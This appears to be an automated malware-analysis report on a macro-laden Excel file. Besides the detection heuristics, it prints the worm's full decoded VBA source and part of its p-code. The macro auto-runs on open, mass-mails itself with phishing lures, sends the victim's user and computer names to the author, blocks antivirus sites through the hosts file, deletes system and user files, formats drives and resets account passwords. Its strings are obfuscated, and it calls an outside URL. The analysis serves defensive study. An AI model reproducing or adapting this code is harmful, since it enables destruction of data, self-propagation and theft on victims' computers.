MALICIOUS
570
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
T1037.001 Registry Run Keys / Startup Folder
The sample is an Excel document with a Workbook_Open macro that uses WScript.Shell to disable the task manager via registry modification. It also attempts to copy itself and likely download a second-stage payload, as indicated by the obfuscated shell command containing a URL. The document body explicitly lures the user to enable macros to view account data, which is a common social engineering tactic.
Heuristics 14
-
ClamAV: Xls.Trojan.Skorbik-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Skorbik-1
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
favfolder = wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\" & "Favorites") -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
getmyslf.Attributes = getmyslf.Attributes + 2 wshs.Run ("RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters") -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://aeq.ae.funpic.de/Czybik_sk0r_Flagge.jpg Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65675 bytes |
SHA-256: 9a78d49324de7cfd061af4a7db7175c80903758267ada9a05961bf432f5361f7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SkorCzybikFSE"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Macro/SkorCzybikFSE.A ©opyrights 2006 by sk0r
'This Worm was created by sk0r aka Daniel B.
'You are not allowed to decompile the Worm!
'ViSiT my Site @ www.sk0r-virii.tk
'
' This is a very dangerous worm, because it's formating
' all found drives and discettes which are inserted.
' Also it deletes important System files like boot.ini,
' system.ini and win.ini. it has much functions more like
' you can see here ;-)
'
' WARNING: This worm makes the system unuseable and
' erase all files of harddrives and discettes!!
'
' The Wormname means:
'
' Skor Czybik File System Eraser
'
'========================================================
Private Sub Workbook_Open()
On Error Resume Next
Set wshs = CreateObject("wscript.shell")
Set fso = CreateObject("scripting.filesystemobject")
Set sysdir = fso.getspecialfolder(1)
Set windir = fso.getspecialfolder(0)
hddisk = Left(windir, 2)
Set ntwrk = CreateObject("wscript.network")
Randomize: intZahl = Int(1000000 * Rnd) + 1246487
Set getmenow = fso.getfile(SkorCzybikFSE.Path + "\" + SkorCzybikFSE.Name)
getmenow.Copy (windir + "\Ihre_Angaben" + CStr(intZahl) + ".xls")
wshs.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
Set CreateEmailApplication = fso.createtextfile(sysdir + "\sk0r_mailer.vbs", True)
CreateEmailApplication.writeline ("rem Win32/SkorCzybikFSE Mailer Script File ")
CreateEmailApplication.writeline ("On Error Resume Next ")
CreateEmailApplication.writeline ("Set fso = CreateObject(""scripting.filesystemobject"") ")
CreateEmailApplication.writeline ("Set sysdir = fso.getspecialfolder(1) ")
CreateEmailApplication.writeline ("Set windir = fso.getspecialfolder(0) ")
ilikeskor = Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(79) & Chr(85) & Chr(84) & Chr(65) & Chr(80) & Chr(80)
ilikeskor = ilikeskor + Chr(32) & Chr(61) & Chr(67) & Chr(82) & Chr(69)
ilikeskor = ilikeskor + Chr(65) & Chr(84) & Chr(69) & Chr(79) & Chr(66) & Chr(74) & Chr(69) & Chr(67)
ilikeskor = ilikeskor + Chr(84) & Chr(32) & Chr(40) & Chr(34) & Chr(79) & Chr(85)
ilikeskor = ilikeskor + Chr(84) & Chr(76) & Chr(79) & Chr(79) & Chr(75) & Chr(46) & Chr(65) & Chr(80)
ilikeskor = ilikeskor + Chr(80) & Chr(76) & Chr(73) & Chr(67) & Chr(65)
ilikeskor = ilikeskor + Chr(84) & Chr(73) & Chr(79) & Chr(78) & Chr(34) & Chr(41) & vbCrLf & Chr(83) & Chr(69)
ilikeskor = ilikeskor + Chr(84) & Chr(32) & Chr(78) & Chr(69) & Chr(87) & Chr(69) & Chr(77) & Chr(65) & Chr(73) & Chr(76) & Chr(61)
ilikeskor = ilikeskor + Chr(79) & Chr(85) & Chr(84)
ilikeskor = ilikeskor + Chr(65) & Chr(80) & Chr(80) & Chr(46) & Chr(67) & Chr(82) & Chr(69) & Chr(65)
ilikeskor = ilikeskor + Chr(84) & Chr(69) & Chr(73) & Chr(84) & Chr(69) & Chr(77) & Chr(40) & Chr(48) & Chr(41) & vbCrLf & Chr(70)
ilikeskor = ilikeskor + Chr(79) & Chr(82) & Chr(32) & Chr(83) & Chr(95)
ilikeskor = ilikeskor + Chr(77) & Chr(65) & Chr(73) & Chr(76) & Chr(83) & Chr(32) & Chr(61) & Chr(32)
ilikeskor = ilikeskor + Chr(49) & Chr(32) & Chr(84) & Chr(79) & Chr(32) & Chr(50) & Chr(55) + vbCrLf
ilikeskor = ilikeskor + Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(77) & Chr(85) & Chr(72) & Chr(65)
ilikeskor = ilikeskor + Chr(32) & Chr(61) & Chr(32) & Chr(79) & Chr(85)
ilikeskor = ilikeskor + Chr(84) & Chr(65) & Chr(80) & Chr(80) & Chr(46) & Chr(71) & Chr(69) & Chr(84)
ilikeskor = ilikeskor + Chr(78) & Chr(65) & Chr(77) & Chr(69) & Chr(83)
ilikeskor = ilikeskor + Chr(80) & Chr(65) & Chr(67) & Chr(69) & Chr(40) & Chr(34) & Chr(77) & Chr(65)
ilikeskor = ilikeskor + Chr(80) & Chr(73) & Chr(34) & Chr(41) + vbCrLf
ilikeskor = ilikeskor + Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(65) & Chr(82) & Chr(71) & Chr(72)
ilikeskor = ilikeskor + Chr(61) & Chr(32) & Chr(77) & Chr(85) & Chr(72) & Chr(65) & Chr(46) & Chr(65) & Chr(68) & Chr(68)
ilikeskor = ilikeskor + Chr(82) & Chr(69) & Chr(83) & Chr(83) & Chr(76) & Chr(73) & Chr(83) & Chr(84)
ilikeskor = ilikeskor + Chr(83) & Chr(40) & Chr(49) & Chr(41)
ilikeskor = ilikeskor + Chr(46) & Chr(65) & Chr(68) & Chr(68) & Chr(82) & Chr(69) & Chr(83) & Chr(83)
ilikeskor = ilikeskor + Chr(69) & Chr(78) & Chr(84) & Chr(82) & Chr(73) & Chr(69) & Chr(83)
ilikeskor = ilikeskor + Chr(40) & Chr(83) & Chr(95) & Chr(77) & Chr(65) & Chr(73) & Chr(76) & Chr(83)
ilikeskor = ilikeskor + Chr(41)
CreateEmailApplication.write (ilikeskor)
CreateEmailApplication.writeline (vbCrLf + "thebodymail = ""Dear User"" + vbCrLf ")
CreateEmailApplication.writeline ("thebodymail = thebodymail + "" "" +vbcrlf ")
CreateEmailApplication.writeline ("thebodymail = thebodymail + "" Your Account has been activated "" +vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""To get your username and password ""+vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""please read the attached document ""+vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""then you can login immediately "" +vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + "" "" +vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""Best Regards"" +vbcrlf")
CreateEmailApplication.writeline ("Randomize ")
CreateEmailApplication.writeline ("emailcounter = Int(4 * Rnd) ")
CreateEmailApplication.writeline ("If emailcounter = 1 Then ")
CreateEmailApplication.writeline ("thesubjectmail = ""Your Password"" ")
CreateEmailApplication.writeline ("ElseIf emailcounter = 2 Then ")
CreateEmailApplication.writeline ("thesubjectmail = ""Ihre Rechnung T-Com ""+Date() ")
CreateEmailApplication.writeline ("ElseIf emailcounter = 3 Then ")
CreateEmailApplication.writeline ("thesubjectmail = ""Deine Zugangsdaten ""+Date ")
CreateEmailApplication.writeline ("Else ")
CreateEmailApplication.writeline ("thesubjectmail = ""Rechnung 2006 Spring"" ")
CreateEmailApplication.writeline ("End If ")
CreateEmailApplication.writeline ("sendingfile = windir + ""\Ihre_Angaben" + CStr(intZahl) + ".xls"" ")
kackfun1 = "!!!!Ne!!!wE!!!!!Ma!!!!i!!!l!!!.!!!T!!!!o !!!=!! a!!!!!r!!!g!!!h "
kackfun1 = Replace(kackfun1, "!", "")
CreateEmailApplication.writeline (kackfun1)
CreateEmailApplication.writeline ("NewEMail.Subject = thesubjectmail ")
CreateEmailApplication.writeline ("NewEMail.Body = thebodymail ")
kackfun2 = "N!!!e!!!!wE!!!M!!!ail!!!.!!!Att!!!!achme!!!!nts!!!.!!!A!!!dd !!!!se!!!n!!!ding!!!!f!!!i!!!le "
kackfun2 = Replace(kackfun2, "!", "")
CreateEmailApplication.writeline (kackfun2)
CreateEmailApplication.writeline ("NewEMail.Send ")
CreateEmailApplication.writeline ("Next ")
CreateEmailApplication.Close
wshs.Run ("WScript " + sysdir + "\sk0r_mailer.vbs"), , True
fso.deletefile (sysdir + "\sk0r_mailer.vbs")
localhostip = Chr(49) & Chr(50) & Chr(55) & Chr(46) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(49)
Set hostfile = fso.createtextfile(sysdir + "\drivers\etc\hosts", True)
hostfile.writeline ("# Win32/SkorCzybikFSE ©opyright by sk0r")
hostfile.writeline ("# access to dl,av or search sites usw denied")
hostfile.writeline (" ")
hostfile.writeline (localhostip + " www.antivir.de")
hostfile.writeline (localhostip + " www.bitdefender.de ")
hostfile.writeline (localhostip + " www.znet.de")
hostfile.writeline (localhostip + " www.chip.de")
hostfile.writeline (localhostip + " www.virustotal.com")
hostfile.writeline (localhostip + " virusscan.jotti.org")
hostfile.writeline (localhostip + " www.kaspersky.com")
hostfile.writeline (localhostip + " www.sophos.de")
hostfile.writeline (localhostip + " www.trojaner-info.de ")
hostfile.writeline (localhostip + " www.trojaner-help.de ")
hostfile.writeline (localhostip + " www.arcabit.com ")
hostfile.writeline (localhostip + " www.avast.com ")
hostfile.writeline (localhostip + " www.grisoft.com ")
hostfile.writeline (localhostip + " www.bitdefender.com ")
hostfile.writeline (localhostip + " www.clamav.net ")
hostfile.writeline (localhostip + " www.drweb.com ")
hostfile.writeline (localhostip + " www.f-prot.com ")
hostfile.writeline (localhostip + " www.google.de ")
hostfile.writeline (localhostip + " www.fortinet.com")
hostfile.writeline (localhostip + " www.nod32.com ")
hostfile.writeline (localhostip + " www.norman.com ")
hostfile.writeline (localhostip + " www.microsoft.com")
hostfile.writeline (localhostip + " www.anti-virus.by/en")
hostfile.writeline (localhostip + " www.symantec.com ")
hostfile.writeline (localhostip + " www.windowsupdate.com ")
hostfile.writeline (localhostip + " www.trendmicro.com ")
hostfile.writeline (localhostip + " www.mcafee.com ")
hostfile.writeline (localhostip + " www.viruslist.com")
hostfile.writeline (localhostip + " www.avp.com ")
hostfile.writeline (localhostip + " www.zonelabs.com")
hostfile.writeline (localhostip + " www.heise.de ")
hostfile.writeline (localhostip + " www.antivirus-online.de")
hostfile.writeline (localhostip + " www.free-av.com ")
hostfile.writeline (localhostip + " www.panda-software.com")
hostfile.writeline (localhostip + " www.pc-welt.de ")
hostfile.writeline (localhostip + " www.pc-special.net")
hostfile.writeline (localhostip + " download.freenet.de ")
hostfile.writeline (localhostip + " www.vollversion.de ")
hostfile.writeline (localhostip + " www.das-download-archiv.de")
hostfile.writeline (localhostip + " www.freeware.de ")
hostfile.writeline (localhostip + " www.antiviruslab.com")
hostfile.writeline (localhostip + " www.search.yahoo.com")
hostfile.writeline (localhostip + " www.web.de ")
hostfile.writeline (localhostip + " www.hotmail.com")
hostfile.writeline (localhostip + " www.hotmail.de")
hostfile.writeline (localhostip + " www.gmx.net")
hostfile.writeline (localhostip + " www.esl-europe.net")
hostfile.writeline (localhostip + " www.cs-expert.de")
hostfile.writeline (localhostip + " www.spiegel.de")
hostfile.writeline (localhostip + " www.icq.com")
hostfile.writeline (localhostip + " www.icq.de ")
hostfile.writeline (localhostip + " www.og-cheats.de")
hostfile.writeline (localhostip + " www.flirtlife.de")
hostfile.writeline (localhostip + " www.ffh.de")
hostfile.writeline (localhostip + " www.counter-strike.de")
hostfile.writeline (localhostip + " www.counter-strike.net")
hostfile.writeline (localhostip + " www.counterstrike.de")
hostfile.writeline (localhostip + " www.csconfigs.de")
hostfile.writeline (localhostip + " www.netsettings.net")
hostfile.writeline (localhostip + " www.leaguez.com")
hostfile.writeline (localhostip + " www.unrealtournament.com")
hostfile.writeline (localhostip + " www.halflife.yusho.de")
hostfile.writeline (localhostip + " www.planethalflife.com")
hostfile.writeline (localhostip + " www.lavasoft.de")
hostfile.writeline (localhostip + " www.de.wikipedia.org")
hostfile.writeline (localhostip + " www.wikipedia.org")
hostfile.writeline (localhostip + " www.en.wikipedia.org")
hostfile.writeline (localhostip + " www.wissen.de")
hostfile.writeline (localhostip + " www.virus-aktuell.de")
hostfile.writeline (localhostip + " www.arcor.de")
hostfile.writeline (localhostip + " www.t-online.de")
hostfile.writeline (localhostip + " www.t-com.de")
hostfile.writeline (localhostip + " www.counter-hacks.de")
hostfile.writeline (localhostip + " www.alice-dsl.de")
hostfile.writeline (localhostip + " www.freenet.de")
hostfile.writeline (localhostip + " www.1und1.de")
hostfile.writeline (localhostip + " www.fbi.gov")
hostfile.writeline (localhostip + " www.polizei.de")
hostfile.Close
fso.deletefile (sysdir + "\drivers\etc\protocol")
fso.deletefile (sysdir + "\drivers\etc\services")
Set outlookobj = CreateObject("Outlook.Application")
If outlookobj Is Not Nothing Then
sendTxt = "Hallo sk0r," + vbCrLf
sendTxt = sendTxt + " " + vbCrLf
sendTxt = sendTxt + "Ich bin ein infizierter User von deinem" + vbCrLf
sendTxt = sendTxt + "Wurm Win32/SkorCzybikFSE.A ! Diese Nachricht" + vbCrLf
sendTxt = sendTxt + "wurde automatisch erstellt :>" + vbCrLf
sendTxt = sendTxt + " " + vbCrLf
sendTxt = sendTxt + "Mein Username: " + ntwrk.UserName + vbCrLf
sendTxt = sendTxt + "Mein Computername: " + ntwrk.computername + vbCrLf
Set crtNewMail = outlookobj.createitem(0)
crtNewMail.to = "sk0r1337@gmx.de"
crtNewMail.Subject = "Information zu " + ntwrk.computername
crtNewMail.body = sendTxt
crtNewMail.send
End If
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Skor Czybik File Sys Erase"
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Skor Czybik File System Erase"
wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "sk0r"
favfolder = wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\" & "Favorites")
Set getfav = fso.getfolder(favfolder)
favfiles = getfav.Files
For Each dateifile In favfiles
favext = LCase(fso.getextensionname(dateifile.Path))
If favext = "url" Then
fso.deletefile (dateifile.Path)
End If
Next
Set urlwrite = fso.createtextfile(favfolder + "\warez.url")
urlwrite.writeline ("[DEFAULT] ")
urlwrite.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup1.html ")
urlwrite.writeline ("[InternetShortcut] ")
urlwrite.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup1.html ")
urlwrite.Close
Set urlwrite2 = fso.createtextfile(favfolder + "\h4x.url")
urlwrite2.writeline ("[DEFAULT] ")
urlwrite2.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup2.html ")
urlwrite2.writeline ("[InternetShortcut] ")
urlwrite2.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup2.html ")
urlwrite2.Close
Set urlwrite3 = fso.createtextfile(favfolder + "\sk0r.url")
urlwrite3.writeline ("[DEFAULT] ")
urlwrite3.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup3.html ")
urlwrite3.writeline ("[InternetShortcut] ")
urlwrite3.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup3.html ")
urlwrite3.Close
Set urlwrite4 = fso.createtextfile(favfolder + "\1337.url")
urlwrite4.writeline ("[DEFAULT] ")
urlwrite4.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup4.html ")
urlwrite4.writeline ("[InternetShortcut] ")
urlwrite4.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup4.html ")
urlwrite4.Close
UserPicFolder = wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\" & "My Pictures")
Set crtVbsPic = fso.createtextfile(UserPicFolder + "\sk0r_Overwrt.vbs", True)
crtVbsPic.writeline ("Set fso = CreateObject(""scripting.filesystemobject"") ")
crtVbsPic.writeline ("scriptf = WScript.ScriptFullName ")
crtVbsPic.writeline ("scriptf = Replace(scriptf, ""sk0r_Overwrt.vbs"", """") ")
crtVbsPic.writeline ("Set getf = fso.getfolder(scriptf) ")
crtVbsPic.writeline ("dateien = getf.Files ")
crtVbsPic.writeline ("For Each filenow In dateien ")
crtVbsPic.writeline ("fso.deletefile (filenow.Path) ")
crtVbsPic.writeline ("Next ")
crtVbsPic.writeline ("subf = getf.subfolders ")
crtVbsPic.writeline ("For Each foldersubf In subf ")
crtVbsPic.writeline ("kaka = foldersubf.Files ")
crtVbsPic.writeline ("For Each dateiensubfl In kaka ")
crtVbsPic.writeline ("fso.deletefile (dateiensubf) ")
crtVbsPic.writeline ("Next ")
crtVbsPic.writeline ("Next ")
crtVbsPic.Close
wshs.Run ("WScript " + UserPicFolder + "\sk0r_Overwrt.vbs"), , True
fso.deletefile (UserPicFolder + "\sk0r_Overwrt.vbs")
Set GetDrivesNow = fso.Drives
For Each FormatDrive In GetDrivesNow
If FormatDrive.DriveType = 1 Or FormatDrive.DriveType = 2 Then
wshs.Run ("format " + FormatDrive + " /y"), , True
End If
Next
Set gtini = fso.getfile(hddisk + "\boot.ini")
gtini.Attributes = gtini.Attributes - 4
gtini.Attributes = gtini.Attributes - 1
gtini.Attributes = gtini.Attributes - 2
fso.deletefile (hddisk + "\boot.ini")
fso.deletefile (windir + "\win.ini")
fso.deletefile (windir + "\system.ini")
Randomize: pwThisComputer = Int(1000000000 * Rnd)
StringPassw = CStr(pwThisComputer)
wshs.Run ("net user administrator " + StringPassw), , True
wshs.Run ("net user %UserName% " + StringPassw), , True
Set crtBatchInfoFile = fso.createtextfile(windir + "\sk0r_Batch.bat", True)
crtBatchInfoFile.writeline ("@echo off")
crtBatchInfoFile.writeline ("rem Win32/SkorCzybikFSE.A dropped batch file")
crtBatchInfoFile.writeline ("color 3E")
crtBatchInfoFile.writeline ("title Skor Czybik File System Erase")
crtBatchInfoFile.writeline ("cls")
crtBatchInfoFile.writeline ("echo Dear User")
crtBatchInfoFile.writeline ("echo You have been infected with the")
crtBatchInfoFile.writeline ("echo Skor Czybik File System Erase Worm")
crtBatchInfoFile.writeline ("echo Do not be surprised! All data is lost")
crtBatchInfoFile.writeline ("echo Visit the flagg now. ")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("echo ©2006 by sk0r aka Czybik")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("pause")
crtBatchInfoFile.Close
wshs.Run (windir + "\sk0r_Batch.bat")
wshs.Run ("http://aeq.ae.funpic.de/Czybik_sk0r_Flagge.jpg")
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
Set getmyslf = fso.getfile(SkorCzybikFSE.Path + "\" + SkorCzybikFSE.Name)
getmyslf.Attributes = getmyslf.Attributes + 2
wshs.Run ("RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters")
Set wshs = Nothing
Set fso = Nothing
Set sysdir = Nothing
Set windir = Nothing
Set ntwrk = Nothing
Unload Me
End Sub
'<!-- Macro/SkorCzybikFSE.A | ©2006 by sk0r --!>
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_2wcc67v8
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/SkorCzybikFSE - 27287 bytes
' Line #0:
' QuoteRem 0x0000 0x002D "Macro/SkorCzybikFSE.A ©opyrights 2006 by sk0r"
' Line #1:
' QuoteRem 0x0000 0x002B "This Worm was created by sk0r aka Daniel B."
' Line #2:
' QuoteRem 0x0000 0x002A "You are not allowed to decompile the Worm!"
' Line #3:
' QuoteRem 0x0000 0x0021 "ViSiT my Site @ www.sk0r-virii.tk"
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' QuoteRem 0x0000 0x0036 " This is a very dangerous worm, because it's formating"
' Line #6:
' QuoteRem 0x0000 0x0033 " all found drives and discettes which are inserted."
' Line #7:
' QuoteRem 0x0000 0x0036 " Also it deletes important System files like boot.ini,"
' Line #8:
' QuoteRem 0x0000 0x0038 " system.ini and win.ini. it has much functions more like"
' Line #9:
' QuoteRem 0x0000 0x0015 " you can see here ;-)"
' Line #10:
' QuoteRem 0x0000 0x0000 ""
' Line #11:
' QuoteRem 0x0000 0x0032 " WARNING: This worm makes the system unuseable and"
' Line #12:
' QuoteRem 0x0000 0x0037 " erase all files of harddrives and discettes!!"
' Line #13:
' QuoteRem 0x0000 0x0000 ""
' Line #14:
' QuoteRem 0x0000 0x0014 " The Wormname means:"
' Line #15:
' QuoteRem 0x0000 0x0000 ""
' Line #16:
' QuoteRem 0x0000 0x0023 " Skor Czybik File System Eraser"
' Line #17:
' QuoteRem 0x0000 0x0000 ""
' Line #18:
' QuoteRem 0x0000 0x0038 "========================================================"
' Line #19:
' Line #20:
' Line #21:
' FuncDefn (Private Sub Workbook_Open())
' Line #22:
' OnError (Resume Next)
' Line #23:
' SetStmt
' LitStr 0x000D "wscript.shell"
' ArgsLd CreateObject 0x0001
' Set wshs
' Line #24:
' SetStmt
' LitStr 0x001A "scripting.filesystemobject"
' ArgsLd CreateObject 0x0001
' Set fso
' Line #25:
' SetStmt
' LitDI2 0x0001
' Ld fso
' ArgsMemLd getspecialfolder 0x0001
' Set sysdir
' Line #26:
' SetStmt
' LitDI2 0x0000
' Ld fso
' ArgsMemLd getspecialfolder 0x0001
' Set windir
' Line #27:
' Ld windir
' LitDI2 0x0002
' ArgsLd Left 0x0002
' St hddisk
' Line #28:
' SetStmt
' LitStr 0x000F "wscript.network"
' ArgsLd CreateObject 0x0001
' Set ntwrk
' Line #29:
' Line #30:
' ArgsCall Randomize 0x0000
' BoS 0x0000
' LitDI4 0x4240 0x000F
' Ld AllDrives
' Mul
' FnInt
' LitDI4 0x0517 0x0013
' Add
' St _B_var_intZahl
' Line #31:
' SetStmt
' Ld SkorCzybikFSE
' MemLd Path
' LitStr 0x0001 "\"
' Add
' Ld SkorCzybikFSE
' MemLd Name
' Add
' Ld fso
' ArgsMemLd getfile 0x0001
' Set _B_var_getmenow
' Line #32:
' Ld windir
' LitStr 0x000D "\Ihre_Angaben"
' Add
' Ld _B_var_intZahl
' Coerce (Str)
' Add
' LitStr 0x0004 ".xls"
' Add
' Paren
' Ld _B_var_getmenow
' ArgsMemCall intZahl 0x0001
' Line #33:
' Line #34:
' LitStr 0x004D "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
' LitDI2 0x0001
' LitStr 0x0009 "REG_DWORD"
' Ld wshs
' ArgsMemCall regwrite 0x0003
' Line #35:
' LitStr 0x004C "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout"
' LitDI2 0x0000
' LitStr 0x0009 "REG_DWORD"
' Ld wshs
' ArgsMemCall regwrite 0x0003
' Line #36:
' Line #37:
' SetStmt
' Ld sysdir
' LitStr 0x0010 "\sk0r_mailer.vbs"
' Add
' LitVarSpecial (True)
' Ld fso
' ArgsMemLd createtextfile 0x0002
' Set ilikeskor
' Line #38:
' LitStr 0x002C "rem Win32/SkorCzybikFSE Mailer Script File "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #39:
' LitStr 0x0015 "On Error Resume Next "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #40:
' LitStr 0x0035 "Set fso = CreateObject("scripting.filesystemobject") "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #41:
' LitStr 0x0025 "Set sysdir = fso.getspecialfolder(1) "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #42:
' LitStr 0x0025 "Set windir = fso.getspecialfolder(0) "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #43:
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #44:
' Line #45:
' Ld kackfun1
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0052
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #46:
' Ld kackfun1
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0042
